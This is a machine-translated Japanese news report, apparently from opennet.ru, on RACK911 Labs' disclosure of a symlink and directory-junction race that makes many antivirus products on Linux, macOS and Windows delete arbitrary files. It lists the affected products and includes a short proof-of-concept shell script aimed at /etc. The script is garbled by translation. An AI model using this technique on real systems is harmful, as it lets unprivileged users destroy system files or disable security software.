RACK911 Labs の研究者
攻撃を実行するには、ウイルス対策が悪意のあるファイルとして認識するファイル (たとえば、テスト署名を使用できます) をアップロードし、一定の時間が経過した後、ウイルス対策が悪意のあるファイルを検出した後、関数を呼び出す直前にアップロードする必要があります。削除するには、ディレクトリをシンボリック リンクのあるファイルに置き換えます。 Windows では、同じ効果を実現するために、ディレクトリ ジャンクションを使用してディレクトリ置換が実行されます。 問題は、ほとんどすべてのウイルス対策ソフトがシンボリック リンクを適切にチェックせず、悪意のあるファイルを削除していると思い込み、シンボリック リンクが指すディレクトリ内のファイルを削除してしまうことです。
Linux と macOS では、この方法で特権のないユーザーが /etc/passwd またはその他のシステム ファイルを削除する方法が示されています。Windows では、ウイルス対策ソフトウェアの DDL ライブラリ自体を削除してその動作をブロックします (Windows では、攻撃は削除のみに限定されます)。現在他のアプリケーションで使用されていないファイル)。 たとえば、攻撃者は「exploit」ディレクトリを作成し、そこにテスト ウイルス シグネチャを含む EpSecApiLib.dll ファイルをアップロードし、「exploit」ディレクトリをリンク「C:\Program Files (x86)\McAfee\」に置き換える可能性があります。 Endpoint Security\Endpoint Security」を削除する前に、「Platform」を削除します。これにより、ウイルス対策カタログから EpSecApiLib.dll ライブラリが削除されます。 Linux と MacOS では、ディレクトリを「/etc」リンクに置き換えることで同様のトリックを実行できます。
#!/ bin / shを
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
while inotifywait -m “/home/user/exploit/passwd” | grep -m 5 “開く”
do
rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
行われ
さらに、Linux および macOS 用のウイルス対策プログラムの多くは、/tmp および /private/tmp ディレクトリ内の一時ファイルを操作するときに、予測可能なファイル名を使用することが判明しました。これは、root ユーザーに権限を昇格するために使用される可能性があります。
現在までに、この問題はほとんどのサプライヤーによってすでに修正されていますが、この問題に関する最初の通知が 2018 年の秋にメーカーに送信されたことは注目に値します。 すべてのベンダーがアップデートをリリースしているわけではありませんが、パッチの適用には少なくとも 6 か月の猶予が与えられており、RACK911 Labs は、現在では自由に脆弱性を公開できると考えています。 RACK911 Labs は長い間脆弱性の特定に取り組んできましたが、アップデートのリリースが遅れ、緊急にセキュリティを修正する必要性が無視されていたため、ウイルス対策業界の同僚と協力することがこれほど困難になるとは予想していなかったことが注目されています。問題。
影響を受ける製品 (無料のウイルス対策パッケージ ClamAV はリストされていません):
- Linux
- BitDefender GravityZone
- コモドエンドポイントセキュリティ
- Esetファイルサーバーのセキュリティ
- F-Secure Linuxセキュリティ
- Kaspersyエンドポイントセキュリティ
- マカフィーエンドポイントセキュリティ
- Linux用SophosAnti-Virus
- Windows
- アバスト無料アンチウイルス
- Avira無料アンチウイルス
- BitDefender GravityZone
- コモドエンドポイントセキュリティ
- F-Secureコンピュータ保護
- FireEyeエンドポイントセキュリティ
- インターセプトX(ソフォス)
- Kaspersky Endpoint Security
- Windows用のMalwarebytes
- マカフィーエンドポイントセキュリティ
- パンダドーム
- ウェブルート セキュア エニウェア
- macOS
- AVG
- BitDefenderトータルセキュリティ
- EsetCyber Security
- カスペルスキーインターネットセキュリティ
- マカフィートータルプロテクション
- Microsoft Defender(ベータ版)
- ノートンセキュリティ
- ソフォスホーム
- ウェブルート セキュア エニウェア
出所: オープンネット.ru